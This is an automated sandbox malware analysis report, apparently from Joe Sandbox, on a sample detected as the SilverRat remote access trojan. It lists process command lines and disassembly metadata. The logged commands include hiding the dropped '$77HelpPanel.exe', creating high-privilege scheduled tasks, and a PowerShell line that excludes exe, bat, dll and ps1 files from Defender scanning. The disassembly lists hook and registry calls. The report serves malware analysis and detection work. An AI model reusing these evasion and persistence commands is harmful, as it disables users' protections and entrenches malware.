                                                      MD5 hash:FE4EE341B4E7E0D03E27893BD6070A3E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: 00000000.00000000.1355697494.00000000004B2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: 00000000.00000002.1404296493.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:15:11:22
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\attrib.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver"
                                                      Imagebase:0x7ff63fc10000
                                                      File size:23'040 bytes
                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:15:11:22
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:15:11:22
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\attrib.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe"
                                                      Imagebase:0x7ff63fc10000
                                                      File size:23'040 bytes
                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:15:11:22
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:15:11:22
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9C90.tmp.bat""
                                                      Imagebase:0x7ff678460000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:15:11:22
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:15:11:22
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\timeout.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:timeout 3
                                                      Imagebase:0x7ff6f4c50000
                                                      File size:32'768 bytes
                                                      MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:10
                                                      Start time:15:11:25
                                                      Start date:13/11/2024
                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe"
                                                      Imagebase:0x6f0000
                                                      File size:46'080 bytes
                                                      MD5 hash:FE4EE341B4E7E0D03E27893BD6070A3E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 61%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:11
                                                      Start time:15:11:28
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"schtasks.exe" /query /TN $77HelpPanel.exe
                                                      Imagebase:0x7ff68a0d0000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:12
                                                      Start time:15:11:28
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:13
                                                      Start time:15:11:28
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
                                                      Imagebase:0x7ff68a0d0000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:14
                                                      Start time:15:11:28
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:15
                                                      Start time:15:11:29
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"schtasks.exe" /query /TN $77HelpPanel.exe
                                                      Imagebase:0x7ff68a0d0000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:16
                                                      Start time:15:11:29
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:17
                                                      Start time:15:11:29
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                                                      Imagebase:0x7ff741d30000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:18
                                                      Start time:15:11:29
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:19
                                                      Start time:15:11:29
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "HelpPanel_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
                                                      Imagebase:0x7ff68a0d0000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:20
                                                      Start time:15:11:29
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:21
                                                      Start time:15:11:29
                                                      Start date:13/11/2024
                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe "\$77HelpPanel.exe" /AsAdmin
                                                      Imagebase:0x370000
                                                      File size:46'080 bytes
                                                      MD5 hash:FE4EE341B4E7E0D03E27893BD6070A3E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:22
                                                      Start time:15:11:31
                                                      Start date:13/11/2024
                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x7ff7fb730000
                                                      File size:496'640 bytes
                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:32.5%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:33.3%
                                                        Total number of Nodes:9
                                                        Total number of Limit Nodes:0

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_00007FFAAB402F09 1 Function_00007FFAAB401708 2 Function_00007FFAAB401308 3 Function_00007FFAAB401802 4 Function_00007FFAAB401A00 5 Function_00007FFAAB4023FE 6 Function_00007FFAAB400FFE 6->2 29 Function_00007FFAAB4012C8 6->29 63 Function_00007FFAAB401288 6->63 7 Function_00007FFAAB4004FA 8 Function_00007FFAAB4006FA 9 Function_00007FFAAB400318 10 Function_00007FFAAB400518 11 Function_00007FFAAB401812 12 Function_00007FFAAB402211 13 Function_00007FFAAB400510 14 Function_00007FFAAB40000A 15 Function_00007FFAAB400D0A 31 Function_00007FFAAB4004C8 15->31 48 Function_00007FFAAB4006E8 15->48 16 Function_00007FFAAB400428 17 Function_00007FFAAB401822 18 Function_00007FFAAB400520 19 Function_00007FFAAB400720 20 Function_00007FFAAB402B1D 20->4 65 Function_00007FFAAB401C88 20->65 106 Function_00007FFAAB401C68 20->106 21 Function_00007FFAAB402D35 22 Function_00007FFAAB400A35 22->13 42 Function_00007FFAAB4004D0 22->42 43 Function_00007FFAAB4006D0 22->43 47 Function_00007FFAAB4004E8 22->47 59 Function_00007FFAAB4004F0 22->59 64 Function_00007FFAAB400688 22->64 77 Function_00007FFAAB4006A0 22->77 82 Function_00007FFAAB4005B8 22->82 84 Function_00007FFAAB4004B0 22->84 88 Function_00007FFAAB400548 22->88 23 Function_00007FFAAB402234 24 Function_00007FFAAB401832 25 Function_00007FFAAB40022F 26 Function_00007FFAAB40012D 27 Function_00007FFAAB40142D 28 Function_00007FFAAB402CC9 30 Function_00007FFAAB401CC8 30->4 30->18 30->23 69 Function_00007FFAAB400580 30->69 97 Function_00007FFAAB400550 30->97 99 Function_00007FFAAB400850 30->99 107 Function_00007FFAAB400568 30->107 116 Function_00007FFAAB400570 30->116 31->2 31->29 31->63 32 Function_00007FFAAB4018C2 33 Function_00007FFAAB4017C2 34 Function_00007FFAAB4023C0 35 Function_00007FFAAB400CBE 36 Function_00007FFAAB4015BD 37 Function_00007FFAAB4009D9 38 Function_00007FFAAB4017D2 39 Function_00007FFAAB4018D2 40 Function_00007FFAAB4025D1 40->10 41 Function_00007FFAAB400FD0 44 Function_00007FFAAB4004CD 45 Function_00007FFAAB4002CD 46 Function_00007FFAAB4028E9 49 Function_00007FFAAB401AE5 49->4 49->18 49->23 49->69 49->97 49->99 49->107 49->116 50 Function_00007FFAAB400CE3 51 Function_00007FFAAB4017E2 52 Function_00007FFAAB4014E1 53 Function_00007FFAAB4011DC 53->2 53->29 53->63 54 Function_00007FFAAB402FF8 55 Function_00007FFAAB4019F7 56 Function_00007FFAAB4006F2 57 Function_00007FFAAB4017F2 58 Function_00007FFAAB4007F0 60 Function_00007FFAAB4019EF 61 Function_00007FFAAB4001ED 62 Function_00007FFAAB4015ED 65->4 65->18 65->23 65->69 65->97 65->99 65->107 65->116 66 Function_00007FFAAB401782 67 Function_00007FFAAB402482 68 Function_00007FFAAB402A81 70 Function_00007FFAAB40287C 71 Function_00007FFAAB40157A 72 Function_00007FFAAB400C99 73 Function_00007FFAAB402492 74 Function_00007FFAAB40228D 75 Function_00007FFAAB40178A 76 Function_00007FFAAB402EA5 76->30 78 Function_00007FFAAB401AA0 78->4 78->18 78->23 78->69 78->97 78->99 78->107 78->116 79 Function_00007FFAAB40289D 80 Function_00007FFAAB40159B 81 Function_00007FFAAB40179A 83 Function_00007FFAAB4017B2 85 Function_00007FFAAB4000AD 86 Function_00007FFAAB4018AD 87 Function_00007FFAAB402AAD 89 Function_00007FFAAB401848 90 Function_00007FFAAB402442 91 Function_00007FFAAB402E41 92 Function_00007FFAAB40153D 93 Function_00007FFAAB40183B 94 Function_00007FFAAB40243A 95 Function_00007FFAAB402558 96 Function_00007FFAAB401351 96->27 98 Function_00007FFAAB400750 100 Function_00007FFAAB401A50 100->4 100->18 100->23 100->69 100->97 100->99 100->107 100->116 101 Function_00007FFAAB400C4F 102 Function_00007FFAAB40014D 103 Function_00007FFAAB40174D 104 Function_00007FFAAB40124B 105 Function_00007FFAAB401A4A 106->4 106->18 106->23 106->69 106->97 106->99 106->107 106->116 108 Function_00007FFAAB402267 109 Function_00007FFAAB400262 110 Function_00007FFAAB401461 111 Function_00007FFAAB40235F 112 Function_00007FFAAB40035D 113 Function_00007FFAAB400875 114 Function_00007FFAAB400C74 115 Function_00007FFAAB401772 117 Function_00007FFAAB40016D 118 Function_00007FFAAB40046D

                                                        Executed Functions

                                                        Function 00007FFAAB402F09 Relevance: 1.6, APIs: 1, Instructions: 116nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 608 7ffaab402f09-7ffaab402fcd NtSetValueKey 612 7ffaab402fd5-7ffaab402ff2 608->612 613 7ffaab402fcf 608->613 613->612
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1409723088.00007FFAAB400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB400000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffaab400000_YDW0S5K7hi.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID:
                                                        • API String ID: 3702945584-0
                                                        • Opcode ID: d6766c8a20a55807e1c23bf4396d920b5dbce6570ea3d48a1ad7cb905ef3b096
                                                        • Instruction ID: c297e6bf164f15eed0286ac3887b688d2926f3865e428fd0d558b7cdbc0aeb90
                                                        • Opcode Fuzzy Hash: d6766c8a20a55807e1c23bf4396d920b5dbce6570ea3d48a1ad7cb905ef3b096
                                                        • Instruction Fuzzy Hash: 9E31C37190CB4C8FDB58EB58D846AE9BBF0FBA9321F14426FD049D3652C774A8428B81
                                                        Function 00007FFAAB4018D2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 30 7ffaab4018d2-7ffaab401991 InternetGetConnectedState 38 7ffaab401999-7ffaab4019c0 30->38 39 7ffaab401993 30->39 39->38
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1409723088.00007FFAAB400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB400000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffaab400000_YDW0S5K7hi.jbxd
                                                        Similarity
                                                        • API ID: ConnectedInternetState
                                                        • String ID: YS^p
                                                        • API String ID: 97057780-2374372923
                                                        • Opcode ID: 3833c7b123ab89caf7b557383e8be2846266bdc3cd19763bd3d6be08a29c2a01
                                                        • Instruction ID: 5219f5fcb0451df4fd5b8eb90dea177caa39cc9d1d61113fce2bcd0593dee6d9
                                                        • Opcode Fuzzy Hash: 3833c7b123ab89caf7b557383e8be2846266bdc3cd19763bd3d6be08a29c2a01
                                                        • Instruction Fuzzy Hash: E231E27290DA488FDB58DF9898497F97BE1EF6A310F04416FE00DC3292DA349945CB81
                                                        Function 00007FFAAB402D35 Relevance: 1.6, APIs: 1, Instructions: 129registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 600 7ffaab402d35-7ffaab402dc6 604 7ffaab402dc8-7ffaab402dcd 600->604 605 7ffaab402dd0-7ffaab402e18 RegOpenKeyExW 600->605 604->605 606 7ffaab402e20-7ffaab402e3f 605->606 607 7ffaab402e1a 605->607 607->606
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1409723088.00007FFAAB400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB400000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffaab400000_YDW0S5K7hi.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: e7c94de835cb4fcab833d6b4f4d302cc4501fce785d3ea796d3cc20c720ea929
                                                        • Instruction ID: 542cd9a1612c946f0370b9aac806a2aa57ffd3a046571c4cb834cdc29644959a
                                                        • Opcode Fuzzy Hash: e7c94de835cb4fcab833d6b4f4d302cc4501fce785d3ea796d3cc20c720ea929
                                                        • Instruction Fuzzy Hash: 1831857191CB488FDB58DF5CD8856E97BE1FB99311F00826FE049D3252DB74A846CB82

                                                        Execution Graph

                                                        Execution Coverage:21.7%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:17
                                                        Total number of Limit Nodes:0
                                                        execution_graph 3480 7ffaab419a5d 3481 7ffaab419a6f 3480->3481 3484 7ffaab4194d0 3481->3484 3483 7ffaab419aab 3485 7ffaab4194d9 SetWindowsHookExW 3484->3485 3487 7ffaab41a641 3485->3487 3487->3483 3496 7ffaab41a44d 3497 7ffaab41a459 SetWindowsHookExW 3496->3497 3499 7ffaab41a641 3497->3499 3476 7ffaab4118ed 3477 7ffaab4118f7 InternetGetConnectedState 3476->3477 3479 7ffaab411993 3477->3479 3488 7ffaab419a01 3489 7ffaab419a2f 3488->3489 3492 7ffaab419408 3489->3492 3493 7ffaab41940d SetWindowsHookExW 3492->3493 3495 7ffaab419a41 3493->3495

                                                        Executed Functions

                                                        Function 00007FFAAB417046 Relevance: .5, Instructions: 470COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 539 7ffaab417046-7ffaab417053 540 7ffaab41705e-7ffaab417127 539->540 541 7ffaab417055-7ffaab41705d 539->541 544 7ffaab417193 540->544 545 7ffaab417129-7ffaab417132 540->545 541->540 546 7ffaab417195-7ffaab4171ba 544->546 545->544 547 7ffaab417134-7ffaab417140 545->547 554 7ffaab4171bc-7ffaab4171c5 546->554 555 7ffaab417226 546->555 548 7ffaab417142-7ffaab417154 547->548 549 7ffaab417179-7ffaab417191 547->549 550 7ffaab417156 548->550 551 7ffaab417158-7ffaab41716b 548->551 549->546 550->551 551->551 553 7ffaab41716d-7ffaab417175 551->553 553->549 554->555 557 7ffaab4171c7-7ffaab4171d3 554->557 556 7ffaab417228-7ffaab4172d0 555->556 568 7ffaab41733e 556->568 569 7ffaab4172d2-7ffaab4172dc 556->569 558 7ffaab41720c-7ffaab417224 557->558 559 7ffaab4171d5-7ffaab4171e7 557->559 558->556 561 7ffaab4171eb-7ffaab4171fe 559->561 562 7ffaab4171e9 559->562 561->561 564 7ffaab417200-7ffaab417208 561->564 562->561 564->558 570 7ffaab417340-7ffaab417369 568->570 569->568 571 7ffaab4172de-7ffaab4172eb 569->571 577 7ffaab41736b-7ffaab417376 570->577 578 7ffaab4173d3 570->578 572 7ffaab4172ed-7ffaab4172ff 571->572 573 7ffaab417324-7ffaab41733c 571->573 575 7ffaab417301 572->575 576 7ffaab417303-7ffaab417316 572->576 573->570 575->576 576->576 579 7ffaab417318-7ffaab417320 576->579 577->578 580 7ffaab417378-7ffaab417386 577->580 581 7ffaab4173d5-7ffaab417466 578->581 579->573 582 7ffaab4173bf-7ffaab4173d1 580->582 583 7ffaab417388-7ffaab41739a 580->583 589 7ffaab41746c-7ffaab41747b 581->589 582->581 584 7ffaab41739c 583->584 585 7ffaab41739e-7ffaab4173b1 583->585 584->585 585->585 587 7ffaab4173b3-7ffaab4173bb 585->587 587->582 590 7ffaab41747d 589->590 591 7ffaab417483-7ffaab4174e8 call 7ffaab417504 589->591 590->591 598 7ffaab4174ea 591->598 599 7ffaab4174ef-7ffaab417502 591->599 598->599
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2619386027.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7ffaab410000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0359a62ab52b7c9dcbae293a1a80aed06f933fce6f3878292e52d275ad234f04
                                                        • Instruction ID: b0a627f69d9a041d85af1059241399b2805c633b13c3267e96914b4f4a4ef970
                                                        • Opcode Fuzzy Hash: 0359a62ab52b7c9dcbae293a1a80aed06f933fce6f3878292e52d275ad234f04
                                                        • Instruction Fuzzy Hash: CFF1B470908A4E8FEBA8DF28D855BE937D1FF55350F04826AE84DC72A2CF3498458B81
                                                        Function 00007FFAAB417DF2 Relevance: .5, Instructions: 455COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 600 7ffaab417df2-7ffaab417dff 601 7ffaab417e0a-7ffaab417ed7 600->601 602 7ffaab417e01-7ffaab417e09 600->602 606 7ffaab417f43 601->606 607 7ffaab417ed9-7ffaab417ee2 601->607 602->601 609 7ffaab417f45-7ffaab417f6a 606->609 607->606 608 7ffaab417ee4-7ffaab417ef0 607->608 610 7ffaab417ef2-7ffaab417f04 608->610 611 7ffaab417f29-7ffaab417f41 608->611 616 7ffaab417f6c-7ffaab417f75 609->616 617 7ffaab417fd6 609->617 612 7ffaab417f06 610->612 613 7ffaab417f08-7ffaab417f1b 610->613 611->609 612->613 613->613 615 7ffaab417f1d-7ffaab417f25 613->615 615->611 616->617 618 7ffaab417f77-7ffaab417f83 616->618 619 7ffaab417fd8-7ffaab417ffd 617->619 620 7ffaab417fbc-7ffaab417fd4 618->620 621 7ffaab417f85-7ffaab417f97 618->621 626 7ffaab41806b 619->626 627 7ffaab417fff-7ffaab418009 619->627 620->619 622 7ffaab417f9b-7ffaab417fae 621->622 623 7ffaab417f99 621->623 622->622 625 7ffaab417fb0-7ffaab417fb8 622->625 623->622 625->620 628 7ffaab41806d-7ffaab41809b 626->628 627->626 629 7ffaab41800b-7ffaab418018 627->629 635 7ffaab41810b 628->635 636 7ffaab41809d-7ffaab4180a8 628->636 630 7ffaab41801a-7ffaab41802c 629->630 631 7ffaab418051-7ffaab418069 629->631 633 7ffaab41802e 630->633 634 7ffaab418030-7ffaab418043 630->634 631->628 633->634 634->634 637 7ffaab418045-7ffaab41804d 634->637 639 7ffaab41810d-7ffaab4181e5 635->639 636->635 638 7ffaab4180aa-7ffaab4180b8 636->638 637->631 640 7ffaab4180ba-7ffaab4180cc 638->640 641 7ffaab4180f1-7ffaab418109 638->641 649 7ffaab4181eb-7ffaab4181fa 639->649 642 7ffaab4180ce 640->642 643 7ffaab4180d0-7ffaab4180e3 640->643 641->639 642->643 643->643 646 7ffaab4180e5-7ffaab4180ed 643->646 646->641 650 7ffaab4181fc 649->650 651 7ffaab418202-7ffaab418264 call 7ffaab418280 649->651 650->651 658 7ffaab41826b-7ffaab41827e 651->658 659 7ffaab418266 651->659 659->658
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2619386027.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7ffaab410000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 479fecbf12a6d35e100b34b75a3d34c2e034500375e9401e890e32beff8408e3
                                                        • Instruction ID: 0705ba1b699a3f4757974eadf6ddc9085a96c830750104473cb7c117da1f0b8d
                                                        • Opcode Fuzzy Hash: 479fecbf12a6d35e100b34b75a3d34c2e034500375e9401e890e32beff8408e3
                                                        • Instruction Fuzzy Hash: 44E1D470908A4E8FEBA8DF28D8557E97BD1FF55350F14826EE84DC72A1CE34A8458BC1
                                                        Function 00007FFAAB41A44D Relevance: 1.8, APIs: 1, Instructions: 290COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 356 7ffaab41a44d-7ffaab41a457 357 7ffaab41a45e-7ffaab41a46f 356->357 358 7ffaab41a459 356->358 360 7ffaab41a471 357->360 361 7ffaab41a476-7ffaab41a487 357->361 358->357 359 7ffaab41a45b 358->359 359->357 360->361 362 7ffaab41a473 360->362 363 7ffaab41a48e-7ffaab41a4f8 361->363 364 7ffaab41a489 361->364 362->361 369 7ffaab41a4fa-7ffaab41a4ff 363->369 370 7ffaab41a502-7ffaab41a534 363->370 364->363 365 7ffaab41a48b 364->365 365->363 369->370 372 7ffaab41a53c-7ffaab41a56f 370->372 373 7ffaab41a536 370->373 375 7ffaab41a57a-7ffaab41a5ed 372->375 376 7ffaab41a571-7ffaab41a579 372->376 373->372 380 7ffaab41a5f3-7ffaab41a600 375->380 381 7ffaab41a679-7ffaab41a67d 375->381 376->375 382 7ffaab41a602-7ffaab41a63f SetWindowsHookExW 380->382 381->382 384 7ffaab41a641 382->384 385 7ffaab41a647-7ffaab41a678 382->385 384->385
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2619386027.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7ffaab410000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID: HookWindows
                                                        • String ID:
                                                        • API String ID: 2559412058-0
